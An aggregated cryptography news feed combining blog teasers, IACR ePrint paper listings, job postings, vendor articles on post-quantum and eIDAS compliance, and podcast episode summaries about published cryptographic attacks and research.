It’s not every day that we see mainstream media get excited about encryption apps! For that reason, the past several days have been fascinating, since we’ve been given not one but several unusual stories about the encryption used in WhatsApp. Or more accurately, if you read the story, a pretty wild allegation that the widely-used … Continue reading WhatsApp Encryption, a Lawsuit, and a Lot of Noise
I learn about cryptographic vulnerabilities all the time, and they generally fill me with some combination of jealousy (“oh, why didn’t I think of that”) or else they impress me with the brilliance of their inventors. But there’s also another class of vulnerabilities: these are the ones that can’t possibly exist in important production software, … Continue reading Kerberoasting
Update 6/10: Based on a short conversation with an engineering lead at X, some of the devices used at X are claimed to be using HSMs. See more further below. Matthew Garrett has a nice post about Twitter (uh, X)’s new end-to-end encryption messaging protocol, which is now called XChat. The TL;DR of Matthew’s post … Continue reading A bit more on Twitter/X’s new encrypted messaging
This is a cryptography blog and I always feel the need to apologize for any post that isn’t “straight cryptography.” I’m actually getting a little tired of apologizing for it (though if you want some hard-core cryptography content, there’s plenty here and here.) Sometimes I have to remind my colleagues that out in the real … Continue reading Dear Apple: add “Disappearing Messages” to iMessage right now
Two weeks ago, the Washington Post reported that the U.K. government had issued a secret order to Apple demanding that the company include a “backdoor” into the company’s end-to-end encrypted iCloud Backup feature. From the article: The British government’s undisclosed order, issued last month, requires blanket capability to view fully encrypted material, not merely assistance … Continue reading Three questions about Apple, encryption, and the U.K.
This is the third and penultimate post in a series about theoretical weaknesses in Fiat-Shamir as applied to proof systems. The first post is here, the second post is here, and you should probably read them. Over the past two posts I’ve given a bit of background on four subjects: (1) interactive proof systems (for … Continue reading How to prove false statements? (Part 3)
I’m supposed to be finishing a wonky series on proof systems (here and here) and I promise I will do that this week. In the midst of this I’ve been a bit distracted by world events. Last week the Washington Post published a bombshell story announcing that the U.K. had filed “technical capability notices” demanding … Continue reading U.K. asks to backdoor iCloud Backup encryption
This is the second part of a two three four-part series, which covers some recent results on “verifiable computation” and possible pitfalls that could occur there. This post won’t make much sense on its own, so I urge you to start with the first part. In the previous post we introduced a handful of concepts, … Continue reading How to prove false statements? (Part 2)
Trigger warning: incredibly wonky theoretical cryptography post (written by a non-theorist)! Also, this will be in two parts. I plan to be back with some more thoughts on practical stuff, like cloud backup, in the near future. If you’ve read my blog over the years, you should understand that I have basically two obsessions. One … Continue reading How to prove false statements? (Part 1)
Recently I came across a fantastic new paper by a group of NYU and Cornell researchers entitled “How to think about end-to-end encryption and AI.” I’m extremely grateful to see this paper, because while I don’t agree with every one of its conclusions, it’s a good first stab at an incredibly important set of questions. … Continue reading Let’s talk about AI and end-to-end encryption
ePrint Report: A Unified Hardware Architecture for Stateful and Stateless Hash-Based Key/Signature Generations
Yechu Zhang, Yuxuan Chu, Yaodong Wei, Yueqin Dai, Qiu Shen, Jing Tian
ePrint Report: On the Use of Atkin and Weber Modular Polynomials in Isogeny Proofs of Knowledge
Thomas den Hollander, Marzio Mula, Daniel Slamanig, Sebastian A. Spindler
ePrint Report: The Verification Theater: When Formal Methods Create False Assurance in Cryptographic Libraries
Nadim Kobeissi
ePrint Report: On the Active Security of the PEARL-SCALLOP Group Action
Tako Boris Fouotsa, Marc Houben, Gioella Lorenzon, Ryan Rueger, Parsa Tasbihgou
ePrint Report: Three-Round (Robust) Threshold ECDSA from Threshold CL Encryption
Bowen Jiang, Guofeng Tang, Haiyang Xue
ePrint Report: Shared and leakage free MAYO
Paco Azevedo-Oliveira, Jordan Beraud, Pierre Varjabedian
ePrint Report: A Visit to KAZ Attack: Finding a Minor Flaw and a Simplified Lattice Construction
Yongbo Hu, Chen Zhang, Guomiao Zhou
ePrint Report: Hardness of hinted ISIS from the space-time hardness of lattice problems
Martin R. Albrecht, Russell W. F. Lai, Eamonn W. Postlethwaite
ePrint Report: Bitcoin PIPEs v2
Michel Abdalla, Brent Carmer, Muhammed El Gebali, Handan Kilinc-Alper, Mikhail Komarov, Yaroslav Rebenko, Lev Soukhanov, Erkan Tairi, Elena Tatuzova, Patrick Towa
ePrint Report: EFFICIENT QUATERNION ALGORITHMS FOR THE DEURING CORRESPONDENCE, AND APPLICATION TO THE EVALUATION OF MODULAR POLYNOMIALS
Antonin Leroux
ePrint Report: Succinct Non-interactive Arguments of Proximity
Liyan Chen, Zhengzhong Jin, Daniel Wichs
ePrint Report: Benchmarking Secure Multiparty Computation Frameworks for Real-World Workloads in Diverse Network Settings
Christopher Harth-Kitzerow, Jonas Schiller, Nina Schwanke, Thomas Prantl, Georg Carle
ePrint Report: Computing in a Safe House: Accountable Universally Composable Asynchronous Secure Distributed Computing
Pierre Civit, Daniel Collins, Vincent Gramoli, Rachid Guerraoui, Jovan Komatovic, Manuel Vidigueira, Pouriya Zarbafian
ePrint Report: Towards Public Tracing: Collaborative Traceable Secret Sharing
Pousali Dey, Rittwik Hajra, Subha Kar, Soumit Pal
ePrint Report: Telling the Story of Chameleon Hash Functions: A 27-Year Review
Houssam Derfoufi, Marina Dehez-Clementi, Jean-Christophe DENEUVILLE
ePrint Report: Nudge: A Private Recommendations Engine
Alexandra Henzinger, Emma Dauterman, Henry Corrigan-Gibbs, Dan Boneh
ePrint Report: Cryptanalytic Extraction of Neural Networks with Various Activation Functions
Xiaokang Qi, Hao Lei, Longxiang Wei, Xiaohan Sun, Meiqin Wang
ePrint Report: A Practical Neighborhood Search Attack on Oracle MLWE
Hongxiao Wang, Muhammed F. Esgin, Ron Steinfeld, Markku-Juhani O. Saarinen, Siu-Ming Yiu
ePrint Report: Differential Pattern Transition: Characterizing the Differential Behavior of AES-like Linear Layers
Jianhua Wang, Tao Huang, Siwei Sun, Hailun Yan, Guang Zeng, Shuang Wu
ePrint Report: Implementable Witness Encryption from Arithmetic Affine Determinant Programs
Lev Soukhanov, Yaroslav Rebenko, Muhammad El Gebali, Mikhail Komarov
ePrint Report: STIP: Efficient and Secure Non-Interactive Transformer Inference via Compact Packing
Zihao Wang, Rongmao Chen, Xinwen Gao, Yi Wang, Lin Liu, Zixin Lan, Zhaoyu Wang, Shaojing Fu, Qiong Wang, Xinyi Huang
ePrint Report: Eidolon: A Practical Post-Quantum Signature Scheme Based on k-Colorability in the Age of Graph Neural Networks
Asmaa Cherkaoui, Ramón Flores, Delaram Kahrobaei, Richard C. Wilson
ePrint Report: A Generalized Attack on RSA and Its Variants
Mengce Zheng, Abderrahmane Nitaj, Maher Boudabra, Michel Seck, Oumar Niang, Djiby Sow
ePrint Report: On The Spectral Theory of Isogeny Graphs and Quantum Sampling of Hard Supersingular Elliptic Curves
David Jao, Maher Mamah
ePrint Report: gcVM: Publicly Auditable MPC via Garbled Circuits with Applications to Private EVM-Compatible Computation
Avishay Yana, Meital Levy, Mike Rosulek, Hila Dahari-Garbian
ePrint Report: New lower bound of the $r$-th order nonlinearity via algebraic immunity
Mikhail Lobanov
ePrint Report: Cryptanalytic Extraction of Recurrent Neural Network Models
Longxiang Wei, Hao Lei, Xiaokang Qi, Xiaohan Sun, Lei Gao, Kai Hu, Wei Wang, Meiqin Wang
ePrint Report: Breaking and Fixing Spoed
Yan Jia, Peng Wang, Gang Liu, Lei Hu, Tingting Guo, Shuping Mao
ePrint Report: Fuzzy Enhanced Private Set Union in Hamming and Minkowski Spaces
Qiang Liu, JaeYoung Bae, Hyung Tae Lee, Joon-Woo Lee
ePrint Report: Secure Montgomery Curves over TMVP-Friendly Primes for High-Performance ECC
Murat Cenk, N. Gamze Orhon Kılıç, Halil Kemal Taşkın, Oğuz Yayla
ePrint Report: Shorter, Tighter, FAESTer: Optimizations and Improved (QROM) Analysis for VOLE-in-the-Head Signatures
Carsten Baum, Ward Beullens, Lennart Braun, Cyprien Delpech de Saint Guilhem, Michael Klooß, Christian Majenz, Shibam Mukherjee, Emmanuela Orsini, Sebastian Ramacher, Christian Rechberger, Lawren ...
ePrint Report: Comment on Makoui
Mohammad Sadegh Ghoralivandzadeh
ePrint Report: IFV: Information Flow Verification at the Pre-silicon Stage Utilizing Static-Formal Methodology
Rasheed Kibria, Farimah Farahmandi, Mark Tehranipoor
ePrint Report: Compact and Low Latency First-Order AES Implementations with Low Randomness
Feng Zhou, Hua Chen, Limin Fan, Junhuai Yang
Announcement: Results of the 2025 Survey on Publication Strategy and Conference Experience
In 2025 we conducted a survey on publication strategy and conference experience. A report of the results is now publicly available at IACR survey results.Job Posting: Staff Software Engineer, Cryptography R&D
SandboxAQ
Closing date for applications:
Contact: James Howe
More information: https://www.sandboxaq.com/careers-list?ashby_jid=357a6ee1-3fe1-44f3-838a-f81df8b4e044
Job Posting: Postdoctoral Fellows in Fully Homomorphic Encryption
Simula UiB AS, Bergen, Norway
The successful candidates will work on two different projects named PREMAL and SECSHARE, respectively, in Håvard Raddum’s team. We are looking for candidates with a PhD degree in Cryptography, Computer Science, Mathematics, or a closely related field to work on the two projects. The focus of the two projects and the profile for their ideal candidates are described on the linked website where you apply (link below and in the headline).
The positions are both for a three-year period. Simula UiB currently has 11 early-career researchers working on a range of research problems in cryptography and information theory.
Simula UiB offers:
Deadline: 15 March 2026
Read more and apply at: https://www.simula.no/careers/job-openings/postdoctoral-fellows-in-fully-homomorphic-encryption-at-simula-uib
Closing date for applications:
Contact: Håvard Raddum
More information: https://www.simula.no/careers/job-openings/postdoctoral-fellows-in-fully-homomorphic-encryption-at-simula-uib
ePrint Report: Leveraging ASIC AI Chips for Homomorphic Encryption
Jianming Tong, Tianhao Huang, Jingtian Dang, Leo de Castro, Anirudh Itagi, anupam golder, asra ali, Jeremy Kun, jevin jiang, arvind arvind, G. Edward Suh, Tushar Krishna
ePrint Report: Dinocchio: Distributed Prover for Ring Arithmetic
Yunhao Wang, Katerina Sotiraki, Fan Zhang
ePrint Report: Setup Protocols for Sender Anonymity
Tian Huang, Jiatai Zhang, Megumi Ando
ePrint Report: In Mid-Stream: Removing the FO-Transform Helps against Leakage but is not Enough
Duyên Pay, Thomas Peters, François-Xavier Standaert
ePrint Report: Hachi: Efficient Lattice-Based Multilinear Polynomial Commitments over Extension Fields
Ngoc Khanh Nguyen, George O'Rourke, Jiapeng Zhang
ePrint Report: Module Learning With Errors and Structured Extrapolated Dihedral Cosets
Weiqiang Wen, Jinwei Zheng
ePrint Report: Oil, Vinegar, and Sparks: Key Recovery from UOV via Single Electromagnetic Fault Injection
Fabio Campos, Daniel Hahn, Daniel Könnecke, Marc Stöttinger
ePrint Report: BOLT: Bootstrapping-Aware Logic Resynthesis and Technology Mapping for Efficient TFHE Circuits
Bhuvnesh Chaturvedi, Ayantika Chatterjee, Anupam Chattopadhyay, Debdeep Mukhopadhyay
ePrint Report: On the Quantum Collision Resistance of HCF Hash Functions
Alisée Lafontaine, André Schrottenloher
ePrint Report: Non-Complete Set Coverings for Higher Order Threshold Implementations
Oriol Farràs, Óscar Fidalgo, Carlos Andres Lara-Nino
ePrint Report: Claiming bounties on small scale Poseidon and Poseidon2 instances using resultant-based algebraic attacks
Antoine Bak, Augustin Bariant, Aurélien Boeuf, Maël Hostettler, Guilhem Jazeron
ePrint Report: Private IP Address Inference in NAT Networks via Off-Path TCP Control-Plane Attack
Suraj Sharma, Adityavir Singh, Mahabir Prasad Jhanwar
ePrint Report: ABBA: Lattice-based Commitments from Commutators
Alberto Centelles, Andrew Mendelsohn
ePrint Report: OptiBridge: A Trustless, Cost-Efficient Bridge Between the Lightning Network and Ethereum
Mohsen Minaei, Duc V. Le, Pedro Moreno-Sanchez
ePrint Report: Feistel Tools: Reprogramming and Query-Recording for QRPs
Yu-Hsuan Huang, Andreas Hülsing, Varun Maram, Silvia Ritsch, Abishanka Saha
ePrint Report: Round-Optimal GUC-Secure Blind Signatures from Minimal Computational and Setup Assumptions
Michele Ciampi, Pierpaolo Della Monica, Ivan Visconti
ePrint Report: Designated-Verifier Dynamic zk-SNARKs with Applications to Dynamic Proofs of Index
Weijie Wang, Charalampos Papamanthou, Shravan Srinivasan, Dimitrios Papadopoulos
ePrint Report: A Unified Treatment of Reachability and Indistinguishability Properties: First-Order Logic with Overwhelming Truth
Gergei Bana, Mitsuhiro Okada
ePrint Report: „One More Time”: Security of One-time Signature Scheme Using Run-length Encoding Under Two-message Attacks
Viktória I. Villányi
ePrint Report: Minimizing Mempool Dependency in PoW Mining on Blockchain: A Paradigm Shift with Compressed Block Representation for Enhanced Scalability, Decentralization and Security.
Gyu Chol Kim
ePrint Report: On the Necessity of Public Contexts in Hybrid KEMs: A Case Study of X-Wing
Taehun Kang, Changmin Lee, Yongha Son
ePrint Report: Cryptanalytic Extraction of Convolutional Neural Networks
Xiaohan Sun, Hao Lei, Longxiang Wei, Xiaokang Qi, Kai Hu, Meiqin Wang, Wei Wang
ePrint Report: From Arithmetic to Shamir: Secure and Efficient Masking Gadgets for Multiplications - Applications to the Post-Quantum Signature Scheme MQOM
Vladimir Sarde, Nicolas Debande, Louis Goubin
ePrint Report: Hensel-lifting black-box algorithms and fast trace computation for elliptic-curve endomorphisms
Lorenz Panny, Damien Robert, Alessandro Sferlazza
ePrint Report: Private Proofs of When and Where
Uma Girish, Grzegorz Gluch, Shafi Goldwasser, Tal Malkin, Leo Orshansky, Henry Yuen
ePrint Report: Randomness-Recovery Trapdoors: a new methodology for enhancing anamorphic encryption
Xuan Thanh Do, Giuseppe Persiano, Duong Hieu Phan, Moti Yung
ePrint Report: Completing the Chain: Verified Implementations of Hash-Based Signatures and Their Security
Manuel Barbosa, François Dupressoir, Rui Fernandes, Andreas Hülsing, Matthias Meijers, Pierre-Yves Strub
If I were to recommend you use a piece of cryptography-relevant software that I created, how would you actually know if it was any good? Trust is, first and foremost, a social problem. If I told you a furry designed a core piece of Internet infrastructure, the reception to this would be mixed, to say […]
In response to the GPG.Fail attacks, a Hacker News user made this claim about the 64-bit “Long Key IDs” used by OpenPGP and GnuPG, while responding to an answer I gave to someone else’s question: OK, to be clear, I am specifically contending that a key fingerprint does not include collisions. My proof is empirical, that no […]
If you think about emails as if they’re anything but the digital equivalent of a postcard–that is to say, postcards provide zero confidentiality–then someone lied to you and I’m sorry you had to find out from a furry blog that sometimes talks about applied cryptography. At the end of 2025, at the 39th Chaos Communications […]
(with apologies to Gil Scott-Heron) If you get all of your important technology news from “content aggregators” like Hacker News, Lobste.rs, and most subreddits, you might be totally unaware of the important but boring infrastructure work happening largely on the Fediverse, indie web, and other less-centralized communities. This is no accident. The rough consensus of […]
I’m pleased to announce the immediate availability of a reference implementation for the Public Key Directory server. This software implements the Key Transparency specification I’ve been working on since last year, and is an important stepping stone towards secure end-to-end encryption for the Fediverse. You can find the software publicly available on GitHub: To get […]
Why replace the elliptic package? Yesterday, the Trail of Bits blog published a post about finding cryptographic bugs in the elliptic library (a Javascript package on NPM) by using Wycheproof. This blog post was accompanied by a new chapter in their Testing Handbook about using Wycheproof as well as two CVEs. It’s pretty cool work, […]
Since I have your attention for the moment, I’d like you to ask yourself a question: What is it that drives you in life? Do you yearn for the feeling of safety? By seeking power, status, wealth, and fame? Is it cravings for pleasure that motivate your actions? Does a sense of obligation to others, […]
It is tempting and forgivable to believe that we’re in control of our social media experiences. After all, we write what we want in our bio, select our avatars, and even come up with our own handles. We decide who we follow, what we post, and which recommendations to consider. It never feels like we’re […]
I have several projects in-flight, and I wanted to write a quick status update for them so that folks can find it easier to follow along. Please bear in mind: This is in addition to, and totally separate from, my full-time employment. Hell Frozen Over A while ago, annoyed by the single point of failure […]
One of the first rules you learn about technical writing is, “Know your audience.” But often, this sort of advice is given without sufficient weight or practical examples. Instead, you’re ushered quickly onto the actual tactile aspects of writing–with the hope that some seed was planted that will sprout later in your education. Science communication […]
In a recent blog post, I laid out the argument that, if you have securely implemented end-to-end encryption in your software, then the jurisdiction where your ciphertext is stored is almost irrelevant. Where jurisdiction does come into play, unfortunately, is where your software is developed and whether or not the local government will employ rubber-hose […]
“Won’t someone think of the poor children?” they say, clutching their pearls as they enact another stupid law that will harm the privacy of every adult on Earth and create Prior Restraint that inhibits the freedom of speech in liberal democracies. If you’re totally ignorant of how things work, the proposal of “verifying you’re an […]
This is a furry blog, where I write about whatever interests me and sign it with my fursona’s name. I sometimes talk about furry fandom topics, but I sometimes also talk about applied cryptography. If you got a mild bit of emotional whiplash from that sentence, the best list of posts to start reading to […]
Every time I lightly touch on this point, I always get someone who insists on arguing with me about it, so I thought it would be worth making a dedicated, singular-focused blog post about this topic without worrying too much about tertiary matters. Here’s the TL;DR: If you actually built your cryptography properly, you shouldn’t […]
I have never seen security and privacy comparison tables (henceforth referred to simply as “checklists” for brevity) used for any other purpose but deception. After pondering this observation, I’m left seriously doubting if these checklists have any valid use case except to manipulate the unsuspecting. Please keep in mind that I’m talking about something very […]
Next month, AMC+ is premiering a new series about furries that tracked down sexual abusers hiding within the furry fandom. It’s called, The Furry Detectives: Unmasking A Monster. You can watch the trailer for this below. And I do recommend watching the trailer before reading the rest of this blog post. Done? Okay. Bad Takes […]
I normally don’t like writing “Current Events” pieces (and greatly prefer focusing on what SEO grifters like to call “evergreen content”), but I feel this warrants it. Content warning: Violence, death, mentions of political extremism. What Does “Great” Mean? Imagining living under constant threats of having your house burned down for 2 years, because your […]
It’s becoming increasingly apparent that one of the reasons why tech companies are so enthusiastic about shoving AI into every product and service is that they fundamentally do not understand why people dislike AI. I will elaborate. I was recently made aware of the Jetbrains developer ecosystem survey, which included a lot of questions about […]
The history of this blog might very well be a cautionary tail (sic) about scope creep. The Original Vision For Dhole Moments Originally, I just wanted a place to write about things too long for Twitter (back when I was an avid Twitter poster). I also figured, if nothing else, it would be a good […]
The types of people that proudly call themselves “influencers,” and describe what they create merely as “content,” are so profoundly allergic to authenticity that it bewilders the mind. Don’t believe me? Look no further than the usage of “unalive” in the modern lexicon. The verb “unalive” became a thing because content creators (predominantly on YouTube) […]
In 2026, post-quantum cryptography (PQC) moves from “future planning” to near-term delivery planning. NIST has approved its first three PQC standards (FIPS 203, 204, and 205), giving the industry a concrete baseline to build on[1].
For Trust Service Providers, banks and governments, eIDAS is no longer just another regulation in the stack. It defines who is trusted, for what, and with which level of legal certainty across the European digital economy.
OpenSSL 3.5 brings the first NIST-standardized post-quantum algorithms into the mainstream OpenSSL toolkit: ML-KEM (key exchange), ML-DSA (lattice signatures), and SLH-DSA (hash-based signatures), believed to withstand large-scale quantum attacks. Large-scale quantum computers will eventually break RSA and ECC. Teams are starting pilots now, before mandates force rushed cutovers.
Selecting the right Trust Service Provider (TSP) vendor is vital for any organisation that issues or relies on Qualified Electronic Signatures (QES), seals, timestamps, or certificates. Under the EU’s eIDAS Regulation, TSPs enable the creation of legally valid and compliant digital transactions across Europe.
With eIDAS 2.0 now in effect, Trust Service Providers across the EU are facing a complex rollout of implementing acts that define the practical application of the new regulation.
Compliance in fintech is anything but straightforward. Between the Payment Card Industry Data Security Standard (PCI DSS) and the National Institute of Standards and Technology (NIST) cybersecurity frameworks, the expectations are high, the details complex, and the pace relentless. For fintechs built on innovation, the challenge isn’t just understanding the rules, it’s keeping up with them while scaling securely and moving fast.
Cryptomathic has completed an independent security assessment of the Mobile Application Security Core (MASC) with NowSecure. The engagement covered iOS and Android builds of the MASC library and a reference application during Q3 2025. Testing aligned to the OWASP Mobile Application Security Verification Standard (MASVS) and used the Mobile Application Security Testing Guide (MASTG) for test execution.
In today’s digital economy, trust is the cornerstone of secure online interactions. Whether signing contracts, authenticating users, or ensuring the integrity of digital communications, Trust Service Providers (TSPs) and Qualified Trust Service Providers (QTSPs) play a crucial role. Both deliver essential services that safeguard transactions and protect identities, but there are significant differences in their recognition, compliance requirements, and legal weight under the EU eIDAS regulation.
Microsoft 365 is the backbone of business productivity, but it also remains one of the most heavily exploited attack surfaces. Business email compromise, malicious macros, and unverified add-ins continue to slip past blunt defenses, leaving organizations stuck between two bad choices: block features and disrupt workflows, or accept the risks and rack up audit findings.
Post-quantum cryptography (PQC) is no longer a theoretical concern. With standards finalized and regulatory frameworks such as DORA, PCI DSS 4.0, and NIS2 setting strict requirements, financial institutions must begin the process of upgrading their cryptographic systems. The transition, however, is far from straightforward.
For several years, CryptoHack has been a free platform for learning modern cryptography through fun and challenging programming puzzles. From toy ciphers to post-quantum cryptography, CryptoHack has a wide-ranging and ever increasing library of puzzles for both the aspiring and accomplished cryptographer. On this episode, Nadim and Lucas are joined by Giacomo Pope and Laurence Tennant, the founders of CryptoHack, to discuss how the platform came to be, and how it evolved, as well as how to improve cryptographic pedagogy more broadly.
Special Guests: Giacomo Pope and Laurence Tennant.
On April 19th 2022, Neil Madden disclosed a vulnerability in many popular Java runtimes and development kits. The vulnerability, dubbed "Psychic Signatures", lies in the cryptography for ECDSA signatures and allows an attacker to bypass signature checks entirely for these signatures. How are popular cryptographic protocol implementations in Java affected? What's the state of Java cryptography as a whole? Join Neil, Nadim and Lucas as they discuss.
Music composed by Yasunori Mitsuda.
Special Guest: Neil Madden.
Threema is a Swiss encrypted messaging application. It has more than 10 million users and more than 7000 on-premise customers. Prominent users of Threema include the Swiss Government and the Swiss Army, as well as the current Chancellor of Germany, Olaf Scholz. Threema has been widely advertised as a secure alternative to other messengers.
Kenny, Kien and Matteo from the ETH Zurich Applied Cryptography Group present seven attacks against the cryptographic protocols used by Threema, in three distinct threat models. All the attacks are accompanied by proof-of-concept implementations that demonstrate their feasibility in practice.
Links and papers discussed in the show:
Special Guests: Kenny Paterson, Kien Tuong Truong, and Matteo Scarlata.
Benjamin Wesolowski talks about his latest paper in which he mathematically proved that the two fundamental problems underlying isogeny-based cryptography are equivalent.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Benjamin Wesolowski.
A team of cryptanalysits presents the first publicly available cryptanalytic attacks on the GEA-1 and GEA-2 algorithms. Instead of providing full 64-bit security, they show that the initial state of GEA-1 can be recovered from as little as 65 bits of known keystream (with at least 24 bits coming from one frame) in time 240 GEA-1 evaluations and using 44.5 GiB of memory. The attack on GEA-1 is based on an exceptional interaction of the deployed LFSRs and the key initialization, which is highly unlikely to occur by chance. This unusual pattern indicates that the weakness is intentionally hidden to limit the security level to 40 bit by design.
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Gaëtan Leurent and Håvard Raddum.
TLS is an internet standard to secure the communication between servers and clients on the internet, for example that of web servers, FTP servers, and Email servers. This is possible because TLS was designed to be application layer independent, which allows its use in many diverse communication protocols.
ALPACA is an application layer protocol content confusion attack, exploiting TLS servers implementing different protocols but using compatible certificates, such as multi-domain or wildcard certificates. Attackers can redirect traffic from one subdomain to another, resulting in a valid TLS session. This breaks the authentication of TLS and cross-protocol attacks may be possible where the behavior of one protocol service may compromise the other at the application layer.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Marcus Brinkmann and Robert Merget.
Nadim talks with Peter Schwabe and Matthias Kannwischer about the considerations — both in terms of security and performance — when implementing cryptographic primitives for low-level and embedded platforms.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Matthias Kannwischer and Peter Schwabe.
Wi-Fi is a pretty central technology to our daily lives, whether at home or at the office. Given that so much sensitive data is regularly exchanged between Wi-Fi devices, a number of standards have been developed to ensure the privacy and authentication of Wi-Fi communications.
However, a recent paper shows that every single Wi-Fi network protection standard since 1997, from WEP all the way to WPA3, is exposed to a critical vulnerability that allows the exfiltration of sensitive data. How far does this new attack go? How does it work? And why wasn’t it discovered before? We’ll discuss this and more in this episode of Cryptography FM.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Mathy Vanhoef.
Contact discovery is a core feature in popular mobile messaging apps such as WhatsApp, Signal and Telegram that lets users grant access to their address book in order to discover which of their contacts are on that messaging service. While contact discovery is critical for WhatsApp, Signal and Telegram to function properly, privacy concerns arise with the current methods and implementations of this feature, potentially resulting in the exposure of a range of sensitive information about users and their social circle.
Do we really need to rely on sharing every phone number on our phone in order for mobile messengers to be usable? What are the privacy risks, and do better cryptographic alternatives exist for managing that data? Joining us are researchers looking exactly into this problem, who will tell us more about their interesting results.
Links and papers discussed in the show:
All the Numbers are US: Large-scale Abuse of Contact Discovery in Mobile Messengers
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Alexandra Dmitrienko, Christian Weinert, and Christoph Hagen.
Secure multi-party computation is a fascinating field in cryptography, researching how to allow multiple parties to compute secure operations over inputs while keeping those inputs private. This makes multi-party computation a super relevant technology in areas such as code signing, hospital records and more.
But what does it take to bring secure multi-party computation from the blank slate of academia and into the messiness of the real world? Today on Cryptography FM, we’re joined by Dr. Yehuda Lindell and Dr. Nigel Smart, from Unbound Security, to tell us about their research, their experiences with real world secure multiparty computation, and more.
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Nigel Smart and Yehuda Lindell.
On March 1st, 2021, a curious paper appeared on the Cryptology ePrint Archive: senior cryptographer Claus Peter Schnorr submitted research that claims to use lattice mathematics to improve the fast factoring of integers so much that he was able to completely “destroy the RSA cryptosystem” -- certainly a serious claim.
Strangely, while the paper’s ePrint abstract did mention RSA, the paper itself didn’t. Two days later, Schnorr pushed an updated version of the paper, clarifying his method.
Does Schnorr’s proposed method for “destroying RSA” hold water, however? Some cryptographers aren’t convinced. Joining us today is Leo Ducas , a tenured researcher at CWI, Amsterdam who specialises in lattice-based cryptography, to help us understand where Schnorr was coming from, whether his results stand on their own, and how the influence of lattice mathematics in applied cryptography has grown over the past decade.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Léo Ducas.
Zero-Knowledge proofs have broadened the realm of use cases for applied cryptography over the past decade, from privacy-enhanced cryptocurrencies to applications in voting, finance, protecting medical data and more. In 2018, Dr. Eli Ben-Sasson and his team introduced ZK-STARKs, a new zero-knowledge construction that functions without trusted setup, thereby broadening what zero-knowledge systems are capable of. We’ll talk about ZK-STARKs and more with Eli in this episode of Cryptography FM.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Eli Ben-Sasson.
Every year, the IACR Real World Cryptography symposium brings together researchers, engineers and practitioners in applied cryptography to discuss cryptography that matters, in the real world. To me, this is the big one! The one cryptography conference that matters the most. Who needs proceedings when you’ve got so much excitement in the air, and so many results and projects that actually have a measurable impact on how cryptography affects the real world?
This year’s program is maybe the most exciting yet, with talks on secure channel protocols, multiparty computation, formal methods, post-quantum cryptography, humans, policy and cryptography, hardware, cryptocurrency, cryptography for the cloud, anonymity and more. So many exciting talks! So much new research to discuss! Like every year, Real World Crypto is shaping up to be a veritable who’s who of applied cryptography.
In this special episode of Cryptography FM, I’m joined by fellow researcher Benjamin Lipp in order to just… candidly go through the program of Real World Crypto 2021 and covering each talk’s abstract briefly.
We’re going to have another special episode after Real World Crypto 2021 as a post-conference episode in order to discuss the highlights of the conference. And hopefully we’ll do this every year here on Cryptography FM!
Music composed by Toby Fox and performed by The Consouls.
Special Guest: Benjamin Lipp.
The race for post-quantum cryptographic signature primitives is in its final lap over at NIST, which recently announced DILITHIUM, FALCON and Rainbow as the three signature primitive finalists. But a paper recently published by KU Leuven researcher Ward Beullens claims to find serious weaknesses in the security of Rainbow, one of those three finalists. In fact, the paper claims that the weaknesses are so severe that Rainbow’s security parameters now fall short of the security requirements set out by the NIST post-quantum competition.
But how does Rainbow work, and how do these weaknesses affect it? And why weren’t they spotted until now? We discuss this and more in this week’s episode of Cryptography FM.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Ward Beullens.
Authenticated encryption such as AES-GCM or ChaCha20-Poly1305 is used in a wide variety of applications, including potentially in settings for which it was not originally designed. A question given relatively little attention is whether an authenticated encryption scheme guarantees “key commitment”: the notion that ciphertext should decrypt to a valid plaintext only under the key that was used to generate the ciphertext.
In reality, however, protocols and applications do rely on key commitment. A new paper by engineers at Google, the University of Haifa and Amazon demonstrates three recent applications where missing key commitment is exploitable in practice. They construct AES-GCM ciphertext which can be decrypted to two plaintexts valid under a wide variety of file formats, such as PDF, Windows executables, and DICOM; and the results may shock you.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Ange Albertini and Stefan Kölbl.
Before there was Signal, before there was WhatsApp, the realm of secure encrypted messaging was ruled by the Off-the-Record secure messaging protocol, created as an alternative to PGP that introduced security properties like forward secrecy and deniability that were considered exotic at the time.
Now, more than a decade later, Off-the-Record messaging, or OTR, has been largely sidelined by Signal variants. But a small team of cryptography engineers is still working on pushing Off-the-Record messaging forward by focusing on use cases that they argue aren’t sufficiently covered by Signal. But what even is deniability, and how much does it matter in the real-world context of secure messaging? Sofía Celi joins us in today’s episode to talk about this and more.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Sofía Celi.
Elliptic-curve signatures have become a highly used cryptographic primitive in secure messaging, TLS as well as in cryptocurrencies due to their high speed benefits over more traditional signature schemes. However, virtually all signature schemes are known to be susceptible to misuse, especially when information about the nonce is leaked to an attacker.
LadderLeak is a new attack that exploits side channels present in ECDSA, claiming to allow real-world breaking of ECDSA with less than a bit of nonce leakage. But what does “less than a bit” mean in this context? Is LadderLeak really that effective at breaking ECDSA, with so little information to go on? Joining us this episode are LadderLeak co-authors Akira Takahashi, Mehdi Tibouchi and Yuval Yarom to discuss these questions and more.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Akira Takahashi, Mehdi Tibouchi, and Yuval Yarom.
Secure messaging protocols like Signal have succeeded at making end-to-end encryption the norm in messaging more generally. Whether you’re using WhatsApp, Wire, Facebook Messenger’s Secret Chat feature, or Signal itself, you’re benefiting from end-to-end encryption across all of your messages and calls, and it’s so transparent that most users aren’t even aware of it!
